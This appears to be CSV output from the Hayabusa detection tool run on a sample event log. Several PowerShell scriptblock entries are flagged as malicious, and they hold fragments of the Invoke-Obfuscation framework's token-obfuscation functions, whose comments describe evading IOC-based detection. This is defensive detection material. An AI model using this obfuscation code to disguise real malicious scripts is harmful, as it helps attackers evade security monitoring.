function at the highest available obfuscation level. Each token has different available obfuscation levels: 'Argument' 1-4 'Command' 1-3 'Comment' 1 'Member' 1-4 'String' 1-2 'Type' 1-2 'Variable' 1 'Whitespace' 1 'All' 1 .EXAMPLE C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' 
-ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} .( ""{0}{2}{1}"" -f'Write','t','-Hos' ) ( 'Hell' + 'o ' +'Wor'+ 'ld!' ) -ForegroundColor ( ""{1}{0}"" -f 'een','Gr') ; .( ""{1}{2}{0}""-f'ost','Writ','e-H' ) ( 'O' + 'bfusca'+ 't' + 'ion Rocks' + '!') -ForegroundColor ( ""{1}{0}""-f'een','Gr' ) .NOTES Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('Member', 'Command', 'CommandArgument', 'String', 'Variable', 'Type', 'RandomWhitespace', 'Comment')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [String] $TokenTypeToObfuscate, [Parameter(Position = 2)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = 10 # Default to highest obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. 
If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # If $TokenTypeToObfuscate was not defined then we will automate randomly calling all available obfuscation functions in Out-ObfuscatedTokenCommand. If($TokenTypeToObfuscate.Length -eq 0) { # All available obfuscation token types (minus 'String') currently supported in Out-ObfuscatedTokenCommand. # 'Comment' and 'String' will be manually added first and second respectively for reasons defined below. # 'RandomWhitespace' will be manually added last for reasons defined below. $ObfuscationChoices = @() $ObfuscationChoices += 'Member' $ObfuscationChoices += 'Command' $ObfuscationChoices += 'CommandArgument' $ObfuscationChoices += 'Variable' $ObfuscationChoices += 'Type' # Create new array with 'String' plus all obfuscation types above in random order. $ObfuscationTypeOrder = @() # Run 'Comment' first since it will be the least number of tokens to iterate through, and comments may be introduced as obfuscation technique in future revisions. $ObfuscationTypeOrder += 'Comment' # Run 'String' second since otherwise we will have unnecessary command bloat since other obfuscation functions create additional strings. $ObfuscationTypeOrder += 'String' $ObfuscationTypeOrder += (Get-Random -Input $ObfuscationChoices -Count $ObfuscationChoices.Count) # Apply each randomly-ordered $ObfuscationType from above step. ForEach($ObfuscationType in $ObfuscationTypeOrder) { $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock]::Create($ScriptString)) $ObfuscationType $ObfuscationLevel } Return $ScriptString } # Parse out and obfuscate tokens (in reverse to make indexes simpler for adding in obfuscated tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) # Handle fringe case of retrieving count of all tokens used when applying random whitespace. 
$TokenCount = ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenTypeToObfuscate}).Count $TokensForInsertingWhitespace = @('Operator','GroupStart','GroupEnd','StatementSeparator') # Script-wide variable ($Script:TypeTokenScriptStringGrowth) to speed up Type token obfuscation by avoiding having to re-tokenize ScriptString for every token. # This is because we are appending variable instantiation at the beginning of each iteration of ScriptString. # Additional script-wide variable ($Script:TypeTokenVariableArray) allows each unique Type token to only be set once per command/script for efficiency and to create less items to create indicators off of. $Script:TypeTokenScriptStringGrowth = 0 $Script:TypeTokenVariableArray = @() If($TokenTypeToObfuscate -eq 'RandomWhitespace') { # If $TokenTypeToObfuscate='RandomWhitespace' then calculate $TokenCount for output by adding token count for all tokens in $TokensForInsertingWhitespace. $TokenCount = 0 ForEach($TokenForInsertingWhitespace in $TokensForInsertingWhitespace) { $TokenCount += ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenForInsertingWhitespace}).Count } } # Handle fringe case of outputting verbiage consistent with options presented in Invoke-Obfuscation. If($TokenCount -gt 0) { # To be consistent with verbiage in Invoke-Obfuscation we will print Argument/Whitespace instead of CommandArgument/RandomWhitespace. $TokenTypeToObfuscateToPrint = $TokenTypeToObfuscate If($TokenTypeToObfuscateToPrint -eq 'CommandArgument') {$TokenTypeToObfuscateToPrint = 'Argument'} If($TokenTypeToObfuscateToPrint -eq 'RandomWhitespace') {$TokenTypeToObfuscateToPrint = 'Whitespace'} If($TokenCount -gt 1) {$Plural = 's'} Else {$Plural = ''} # Output verbiage concerning which $TokenType is currently being obfuscated and how many tokens of each type are left to obfuscate. 
# This becomes more important when obfuscated large scripts where obfuscation can take several minutes due to all of the randomization steps. Write-Host ""`n[*] Obfuscating $($TokenCount)"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" token$Plural."" } # Variables for outputting status of token processing for large token counts when obfuscating large scripts. $Counter = $TokenCount $OutputCount = 0 $IterationsToOutputOn = 100 $DifferenceForEvenOutput = $TokenCount % $IterationsToOutputOn For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Extra output for large scripts with several thousands tokens (like Invoke-Mimikatz). If(($TokenCount -gt $IterationsToOutputOn*2) -AND ((($TokenCount-$Counter)-($OutputCount*$IterationsToOutputOn)) -eq ($IterationsToOutputOn+$DifferenceForEvenOutput))) { $OutputCount++ $ExtraWhitespace = ' '*(([String]($TokenCount)).Length-([String]$Counter).Length) If($Counter -gt 0) { Write-Host ""[*] $ExtraWhitespace$Counter"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" tokens remaining to obfuscate."" } } $ObfuscatedToken = """" If(($Token.Type -eq 'String') -AND ($TokenTypeToObfuscate.ToLower() -eq 'string')) { $Counter-- # If String $Token immediately follows a period (and does not begin $ScriptString) then do not obfuscate as a String. # In this scenario $Token is originally a Member token that has quotes added to it. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If(($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) { Continue } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. 
If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Binding Validation Attributes cannot have their string values formatted with the -f format operator unless treated as a scriptblock. # When we find strings following these Parameter Binding Validation Attributes then if we are using a -f format operator we will treat the result as a scriptblock. # Source: https://technet.microsoft.com/en-us/library/hh847743.aspx $ParameterValidationAttributesToTreatStringAsScriptblock = @() $ParameterValidationAttributesToTreatStringAsScriptblock += 'alias' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allownull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptystring' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptycollection' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatecount' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatelength' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatepattern' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validaterange' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatescript' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validateset' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnullorempty' $ParameterValidationAttributesToTreatStringAsScriptblock += 'helpmessage' $ParameterValidationAttributesToTreatStringAsScriptblock += 'confirmimpact' $ParameterValidationAttributesToTreatStringAsScriptblock += 'outputtype' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel 
value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Member') -AND ($TokenTypeToObfuscate.ToLower() -eq 'member')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Attributes cannot be obfuscated like other Member Tokens, so we will only randomize the case of these tokens. # Source 1: https://technet.microsoft.com/en-us/library/hh847743.aspx $MemberTokensToOnlyRandomCase = @() $MemberTokensToOnlyRandomCase += 'mandatory' $MemberTokensToOnlyRandomCase += 'position' $MemberTokensToOnlyRandomCase += 'parametersetname' $MemberTokensToOnlyRandomCase += 'valuefrompipeline' $MemberTokensToOnlyRandomCase += 'valuefrompipelinebypropertyname' $MemberTokensToOnlyRandomCase += 'valuefromremainingarguments' $MemberTokensToOnlyRandomCase += 'helpmessage' $MemberTokensToOnlyRandomCase += 'alias' # Source 2: https://technet.microsoft.com/en-us/library/hh847872.aspx $MemberTokensToOnlyRandomCase += 'confirmimpact' $MemberTokensToOnlyRandomCase += 'defaultparametersetname' $MemberTokensToOnlyRandomCase += 'helpuri' $MemberTokensToOnlyRandomCase += 'supportspaging' $MemberTokensToOnlyRandomCase += 'supportsshouldprocess' $MemberTokensToOnlyRandomCase += 'positionalbinding' $MemberTokensToOnlyRandomCase += 'ignorecase' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1} 4 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2} default 
{Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'CommandArgument') -AND ($TokenTypeToObfuscate.ToLower() -eq 'commandargument')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} 4 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"} ElseIf(($Token.Type -eq 'Command') -AND ($TokenTypeToObfuscate.ToLower() -eq 'command')) { $Counter-- # Set valid obfuscation levels for current 
token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # If a variable is encapsulated in curly braces (e.g. ${ExecutionContext}) then the string inside is treated as a Command token. # So we will force tick obfuscation (option 1) instead of splatting (option 2) as that would cause errors. If(($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '{') -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '}')) { $ObfuscationLevel = 1 } Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} 3 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Variable') -AND ($TokenTypeToObfuscate.ToLower() -eq 'variable')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. 
If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Type') -AND ($TokenTypeToObfuscate.ToLower() -eq 'type')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Type value substrings are part of Types that cannot be direct Type casted, so we will not perform direct Type casting on Types containing these values. $TypesThatCannotByDirectTypeCasted = @() $TypesThatCannotByDirectTypeCasted += 'directoryservices.accountmanagement.' $TypesThatCannotByDirectTypeCasted += 'windows.clipboard' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($TokensForInsertingWhitespace -Contains $Token.Type) -AND ($TokenTypeToObfuscate.ToLower() -eq 'randomwhitespace')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. 
If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Comment') -AND ($TokenTypeToObfuscate.ToLower() -eq 'comment')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RemoveComments $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } } Return $ScriptString } Function Out-ObfuscatedStringTokenLevel1 { <# .SYNOPSIS Obfuscates string token by randomly concatenating the string in-line. Invoke-Obfuscation Function: Out-ObfuscatedStringTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringTokenLevel1 obfuscates a given string token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. 
For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the String token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host ('Hello'+' W'+'orl'+'d!') -ForegroundColor Green; Write-Host ('Obfuscation R'+'oc'+'k'+'s'+'!') -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host (""{2}{3}{0}{1}"" -f 'Wo','rld!','Hel','lo ') -ForegroundColor Green; Write-Host (""{4}{0}{3}{2}{1}""-f 'bfusca','cks!','Ro','tion ','O') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. 
C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'String' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $EncapsulateAsScriptBlockInsteadOfParentheses = $FALSE # Extract substring to look for parameter binding values to check against $ParameterValidationAttributesToTreatStringAsScriptblock set in the beginning of this script. $SubStringLength = 25 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Replace(' ','').Replace(""`t"",'').Replace(""`n"",'') $SubStringLength = 5 If($SubString.Length -lt $SubStringLength) { $SubStringLength = $SubString.Length } $SubString = $SubString.SubString($SubString.Length-$SubStringLength,$SubStringLength) # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. If(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND ($SubString.Contains('(') -OR $SubString.Contains(',')) -AND $ScriptString.SubString(0,$Token.Start).Contains('[') -AND $ScriptString.SubString(0,$Token.Start).Contains('(')) { # Gather substring preceding the current String token to see if we need to treat the obfuscated string as a scriptblock. 
$ParameterBindingName = $ScriptString.SubString(0,$Token.Start) $ParameterBindingName = $ParameterBindingName.SubString(0,$ParameterBindingName.LastIndexOf('(')) $ParameterBindingName = $ParameterBindingName.SubString($ParameterBindingName.LastIndexOf('[')+1).Trim() # Filter out values that are not Parameter Binding due to contain whitespace, some special characters, etc. If(!$ParameterBindingName.Contains(' ') -AND !$ParameterBindingName.Contains('.') -AND !$ParameterBindingName.Contains(']') -AND !($ParameterBindingName.Length -eq 0)) { # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($ParameterValidationAttributesToTreatStringAsScriptblock -Contains $ParameterBindingName.ToLower()) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } ElseIf(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND $ScriptString.SubString($Token.Start-5,5).Contains('=')) { # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. ForEach($Parameter in $ParameterValidationAttributesToTreatStringAsScriptblock) { $SubStringLength = $Parameter.Length # Add 10 more to $SubStringLength in case there is excess whitespace between the = sign. $SubStringLength += 10 # Shorten substring length in case there is not enough room depending on the location of the token in the $ScriptString. If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring to compare against $EncapsulateAsScriptBlockInsteadOfParentheses. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength+1).Trim() # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($SubString -Match ""$Parameter.*="") { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } # Do nothing if the token has length <= 1 (e.g. 
Write-Host """", single-character tokens, etc.). If($Token.Content.Length -le 1) {Return $ScriptString} # Do nothing if the token has length <= 3 and $ObfuscationLevel is 2 (reordering). If(($Token.Content.Length -le 3) -AND $ObfuscationLevel -eq 2) {Return $ScriptString} # Do nothing if $Token.Content already contains a { or } to avoid parsing errors when { and } are introduced into substrings. If($Token.Content.Contains('{') -OR $Token.Content.Contains('}')) {Return $ScriptString} # If the Token is 'invoke' then do nothing. This is because .invoke() is treated as a member but .""invoke""() is treated as a string. If($Token.Content.ToLower() -eq 'invoke') {Return $ScriptString} # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # Tokenizer removes ticks from strings, but we want to keep them. So we will replace the contents of $Token.Content with the manually extracted token data from the original $ScriptString. $TokenContent = $ScriptString.SubString($Token.Start+1,$Token.Length-2) # If a variable is present in a string, more work needs to be done to extract from string. Warning maybe should be thrown either way. # Must come back and address this after vacation. # Variable can be displaying or setting: ""setting var like $($var='secret') and now displaying $var"" # For now just split on whitespace instead of passing to Out-Concatenated If($TokenContent.Contains('$') -OR $TokenContent.Contains('`')) { $ObfuscatedToken = '' $Counter = 0 # If special use case is met then don't substring the current Token to avoid errors. # The special cases involve a double-quoted string containing a variable or a string-embedded-command that contains whitespace in it. # E.g. 
""string ${var name with whitespace} string"" or ""string $(gci *whitespace_in_command*) string"" $TokenContentSplit = $TokenContent.Split(' ') $ContainsVariableSpecialCases = (($TokenContent.Contains('$(') -OR $TokenContent.Contains('${')) -AND ($ScriptString[$Token.Start] -eq '""')) If($ContainsVariableSpecialCases) { $TokenContentSplit = $TokenContent } ForEach($SubToken in $TokenContentSplit) { $Counter++ $ObfuscatedSubToken = $SubToken # Determine if use case of variable inside of double quotes is present as this will be handled differently below. $SpecialCaseContainsVariableInDoubleQuotes = (($ObfuscatedSubToken.Contains('$') -OR $ObfuscatedSubToken.Contains('`')) -AND ($ScriptString[$Token.Start] -eq '""')) # Since splitting on whitespace removes legitimate whitespace we need to add back whitespace for all but the final subtoken. If($Counter -lt $TokenContent.Split(' ').Count) { $ObfuscatedSubToken = $ObfuscatedSubToken + ' ' } # Concatenate $SubToken if it's long enough to be concatenated. If(($ObfuscatedSubToken.Length -gt 1) -AND !($SpecialCaseContainsVariableInDoubleQuotes)) { # Concatenate each $SubToken via Out-StringDelimitedAndConcatenated so it will handle any replacements for special characters. # Define -PassThru flag so an invocation is not added to $ObfuscatedSubToken. $ObfuscatedSubToken = Out-StringDelimitedAndConcatenated $ObfuscatedSubToken -PassThru # Evenly trim leading/trailing parentheses. 
While($ObfuscatedSubToken.StartsWith('(') -AND $ObfuscatedSubToken.EndsWith(')')) { $ObfuscatedSubToken = ($ObfuscatedSubToken.SubString(1,$ObfuscatedSubToken.Length-2)).Trim() } } Else { If($SpecialCaseContainsVariableInDoubleQuotes) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } ElseIf($ObfuscatedSubToken.Contains(""'"") -OR $ObfuscatedSubToken.Contains('$')) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } Else { $ObfuscatedSubToken = ""'"" + $ObfuscatedSubToken + ""'"" } } # Add obfuscated/trimmed $SubToken back to $ObfuscatedToken if a Replace operati",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"} ElseIf(($Token.Type -eq 'Command') -AND ($TokenTypeToObfuscate.ToLower() -eq 'command')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # If a variable is encapsulated in curly braces (e.g. ${ExecutionContext}) then the string inside is treated as a Command token. # So we will force tick obfuscation (option 1) instead of splatting (option 2) as that would cause errors. 
If(($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '{') -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '}')) { $ObfuscationLevel = 1 } Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} 3 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Variable') -AND ($TokenTypeToObfuscate.ToLower() -eq 'variable')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Type') -AND ($TokenTypeToObfuscate.ToLower() -eq 'type')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Type value substrings are part of Types that cannot be direct Type casted, so we will not perform direct Type casting on Types containing these values. 
$TypesThatCannotByDirectTypeCasted = @() $TypesThatCannotByDirectTypeCasted += 'directoryservices.accountmanagement.' $TypesThatCannotByDirectTypeCasted += 'windows.clipboard' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($TokensForInsertingWhitespace -Contains $Token.Type) -AND ($TokenTypeToObfuscate.ToLower() -eq 'randomwhitespace')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Comment') -AND ($TokenTypeToObfuscate.ToLower() -eq 'comment')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default 